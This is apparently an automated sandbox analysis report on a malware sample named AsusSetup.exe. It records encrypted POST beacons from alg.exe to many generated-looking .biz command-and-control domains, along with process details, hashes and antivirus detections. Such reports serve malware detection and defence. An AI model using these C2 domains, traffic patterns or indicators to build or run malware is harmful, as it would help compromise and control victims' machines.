                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: ?EK=KMKUD%4;afF1k"$'r6{|3!KvWG`OqM$XV8lC#Ns{NNK@Zp\[Y,+4cAGOJqcL>,w}3G"'{#}iE_rN|1
Oct 28, 2024 16:52:47.453248024 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=35a230a9f03934c5637dbc965b718612|155.94.241.188|1730130767|1730130767|0|1|0; path=/; domain=.ijnmvqa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
126 | 192.168.2.5 | 60002 | 18.208.156.248 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:47.504612923 CET | 350 | OUT | POST /agvjkxoax HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tltxn.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:47.504640102 CET | 778 | OUT | Data Raw: c9 54 c3 76 cd 27 ed 4f fe 02 00 00 1b ca 90 e7 67 8c 44 8a c1 86 b7 d8 41 42 61 83 87 a6 2f 9e c3 3a 23 ac 91 fd 81 e9 33 19 a8 e6 2f f3 a3 89 20 40 89 35 8f 8c c0 9c 10 e4 d0 7b 9e 73 68 19 eb 6f df 17 59 cd 8f c1 0f a0 81 b5 31 f3 23 3d ee 42
Data Ascii: Tv'OgDABa/:#3/ @5{shoY1#=B"jo\KXS5ybw>#c}3W_z!Se~?KD1[`L[wQMVyRz]TW[c]|gx7rAPxQJOiYtEL{-*6I1Of/rim
Oct 28, 2024 16:52:48.176425934 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5fd9e6771f810c04187364fca1a2c986|155.94.241.188|1730130768|1730130768|0|1|0; path=/; domain=.tltxn.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
127 | 192.168.2.5 | 60003 | 54.244.188.177 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:48.204962969 CET | 349 | OUT | POST /gopuf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vgypotwp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:48.204989910 CET | 778 | OUT | Data Raw: f5 3c f6 88 40 bd 89 c9 fe 02 00 00 9e dd 00 59 5c 20 b9 18 a4 39 0e f0 76 56 5d 8c 20 fd d7 7d a5 72 e0 aa 12 69 a6 4d 90 d7 c3 35 fc 2f 20 40 55 02 84 d2 10 5b 1e ce 01 e8 11 be 33 c3 6e 37 87 b6 11 60 e3 fd ea 12 32 d2 8a da 55 9e 8a 06 ed 81
Data Ascii: <@Y\ 9vV] }riM5/ @U[3n7`2UEi*hobBc<S5M~^SE.R 3&kfkGElRgMH9]dHY[Yx&,zjX'kT('"&.V<_0q!/H
Oct 28, 2024 16:52:49.085321903 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1276720df5c555a96cb1b901a6f243d8|155.94.241.188|1730130768|1730130768|0|1|0; path=/; domain=.vgypotwp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
128 | 192.168.2.5 | 60004 | 18.246.231.120 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:49.127609015 CET | 347 | OUT | POST /cfjx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: giliplg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:49.127643108 CET | 778 | OUT | Data Raw: b8 4b e4 10 d5 1a 39 05 fe 02 00 00 90 cc 99 13 8c 30 f0 62 b5 a1 84 c0 81 ea f1 69 21 84 c5 01 61 16 26 d5 24 bc 0d 3b 2a 4e 14 3b db 89 f8 b6 01 ca 45 64 e1 2c 7f 09 43 93 96 21 76 b0 e2 7c 55 e3 d9 3c 58 c3 4c 7f 23 57 08 33 52 19 7f 1f b1 86
Data Ascii: K90bi!a&$;*N;Ed,C!v|U<XL#W3REA&$5:d<ae;AJ;ITK E=e;s1/-M GDOxR1FCqAC-wKV%u;t;F~XzG\$B,<*nz5p>s
Oct 28, 2024 16:52:49.959461927 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=15f3ae4d814c564364e51aa340477d69|155.94.241.188|1730130769|1730130769|0|1|0; path=/; domain=.giliplg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
129         192.168.2.5  60005        54.244.188.177  80                2636  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:52:50.053610086 CET  359  OUT  POST /rtjiyksbemvook HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:50.053637028 CET  778  OUT  Data Raw: ad 3c 8f c2 11 1f f4 a4 fe 02 00 00 cc 19 b2 ee bf d7 45 60 4f 1b 80 93 54 01 39 74 f5 e9 4d 88 0e 3c 1c d0 50 ad 85 2e 9e b6 1a 0b c3 07 3e ed c4 5f 2f 24 9e 2f 11 e6 cd 14 20 2b 48 82 90 fb fe da c8 7e 23 7a f2 9f ff 52 1b 65 93 56 af 92 f0 08
Oct 28, 2024 16:52:50.819294930 CET  417  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=a4769efbc79841a30b2ce72ccae5ef3b|155.94.241.188|1730130770|1730130770|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
130         192.168.2.5  60006        18.141.10.107   80                2636  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:52:50.878051043 CET  350  OUT  POST /gidkqlg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:50.878078938 CET  778  OUT  Data Raw: 0a ba 40 5f 9f fc be 5a fe 02 00 00 7e 41 2e 80 7e ba 0e 31 be 91 4f 47 81 2b b7 40 40 7e ad a5 db 2d d9 e3 45 ad bf 26 9a 1d 32 c2 9a 1d 17 b6 1c 75 07 25 22 04 c2 9a 80 b9 52 d3 17 59 1d 87 d8 57 05 d7 f0 ba 74 65 c9 87 03 fc 8a 94 ad 0b 2d 02
Oct 28, 2024 16:52:52.319886923 CET  415  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=1566c29bdb14d1b3e9c7fe5e9e8a2995|155.94.241.188|1730130772|1730130772|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
131         192.168.2.5  60007        54.244.188.177  80                2636  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:52:52.344511986 CET  345  OUT  POST /oiol HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:52.344528913 CET  778  OUT  Data Raw: 93 54 61 7a e3 3e 55 c8 fe 02 00 00 dc 71 5b 55 d5 80 19 35 16 c1 cd 58 12 3f c3 ac e7 71 23 bc ca e1 81 99 d4 21 8e a0 26 3e 77 91 94 9a 43 fd 89 73 60 fd 67 71 2c fa cd 06 8b a5 b6 8e 9c 74 2b ae 0f d7 40 7a df 65 f7 ae df e3 a5 ca 68 fd 28 3c
Oct 28, 2024 16:52:53.174709082 CET  413  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=908e3d99f5966c9a7d0a98e4515e412b|155.94.241.188|1730130773|1730130773|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
132         192.168.2.5  60008        44.221.84.105   80                2636  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:52:53.628225088 CET  354  OUT  POST /clexsjcapi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:53.628277063 CET | 778 | OUT | Data Raw: 1f 1f 88 ff b6 a7 46 04 fe 02 00 00 79 ff 04 25 dc 29 35 15 0a ed eb 0b fd 61 1f 4c 45 c2 9a 4b f1 2e 97 f5 49 b7 42 4a a7 79 b3 dd e0 3f 59 8e 25 64 42 b3 8f 27 da 72 0e 68 6d 96 a9 29 ec 9a cd c9 8a 59 56 93 f0 17 e7 25 4b b0 1f 44 48 b2 16 c6
Oct 28, 2024 16:52:54.304781914 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=3543659cc3d3a9c95d4db311b00fa683|155.94.241.188|1730130774|1730130774|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
133 | 192.168.2.5 | 60009 | 172.234.222.143 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:54.326935053 CET | 349 | OUT | POST /inwjou HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:54.326935053 CET | 778 | OUT | Data Raw: e5 77 7e 27 21 bd fd f7 fe 02 00 00 b2 00 18 47 f7 32 15 52 5a 31 f2 f6 10 df a7 89 8c d0 05 7b 7c 9c 34 fd 53 9f 5e e7 a8 74 bd 93 2f e6 7a 94 12 f2 82 bb 3c 37 3c eb 31 ed b3 81 83 b4 cc 62 9a aa 8d a3 92 09 9d a6 26 7e 81 29 0b 3b e2 4b 63 ca


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
134 | 192.168.2.5 | 60010 | 172.234.222.143 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:55.000348091 CET | 349 | OUT | POST /ejhxrp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:55.000415087 CET | 778 | OUT | Data Raw: 75 0c 29 5b 99 11 03 4e fe 02 00 00 20 37 05 fb ba 6c 27 79 03 95 cd 5c a4 73 ab 17 7d da 61 b8 45 50 42 99 2c 0a c7 e4 e9 19 9e f0 60 79 20 f8 fc c0 ba 4f 8c 3b 01 7b 33 f9 57 65 30 0e e4 7b 89 e3 dd a1 58 27 be 06 97 ae 4c 2d c6 b7 49 8b 2f 2c


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
135 | 192.168.2.5 | 60011 | 18.141.10.107 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:55.959419012 CET | 346 | OUT | POST /kt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:55.959434032 CET | 778 | OUT | Data Raw: d1 71 d7 c2 df 5a 20 1c fe 02 00 00 72 62 ae b5 b2 7c 8c fb 6b cc 5c ee 86 34 f2 9a 8b 6b b0 21 2e 56 7b ba 4b 87 a1 83 0c af 96 70 77 45 14 ee d1 38 ca 18 5c dc 8a c8 0f 82 1c ec 83 5c 32 07 2f 85 4f 04 72 8e e3 74 18 54 ea 4d 91 e8 23 cd 66 4b
Oct 28, 2024 16:52:57.789963007 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=cc06133a1e38341c1b3ccfce878420dd|155.94.241.188|1730130777|1730130777|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0
Oct 28, 2024 16:52:57.789998055 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=cc06133a1e38341c1b3ccfce878420dd|155.94.241.188|1730130777|1730130777|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
136 | 192.168.2.5 | 60012 | 82.112.184.197 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:57.835853100 CET | 355 | OUT | POST /ctmnxqregqafw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:57.835887909 CET | 778 | OUT | Data Raw: bc 1f f0 bb 13 94 66 1c fe 02 00 00 45 52 c8 29 66 49 d6 96 cc 20 fb 17 cb f0 4c 1f 5d ce 8f 5a bb b5 ef ac e7 9e 83 ec b5 3c 95 8a 2c 03 7b b5 83 93 62 a9 1b f4 4d 47 db f0 b3 10 92 60 d2 88 e5 b8 5d ea 98 61 96 c1 ed cb 27 c7 5a 71 7d 69 e5 75
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: fER)fI L]Z<,{bMG`]a'Zq}iuA2X |+q ?'f.faNmhg:DthP.oE!Uo:t<mJ;d^G#Zm/%flC:~G&U${Gl*$Mnw^



                                                                                                                                                                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                                                                                                                                                                  Start time:11:49:56
                                                                                                                                                                                                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\AsusSetup.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                  File size:5'251'072 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5 hash:13BF2819401D2F983FFF90C1960831B8
                                                                                                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                                                                                                                                                                                  Start time:11:49:56
                                                                                                                                                                                                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                  File size:1'445'888 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5 hash:828741995F05BE2FD6B071628F96F6B9
                                                                                                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                                                                                                                                                                                  Start time:11:49:57
                                                                                                                                                                                                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                  File size:1'381'376 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5 hash:332F38054E08BAEC551611993C8D1317
                                                                                                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                  Has exited:false

Target ID:4
Start time:11:49:57
Start date:28/10/2024
Path:C:\Windows\System32\drivers\AppVStrm.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:138'056 bytes
MD5 hash:BDA55F89B69757320BC125FF1CB53B26
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:false

Target ID:5
Start time:11:49:57
Start date:28/10/2024
Path:C:\Windows\System32\drivers\AppvVemgr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:174'408 bytes
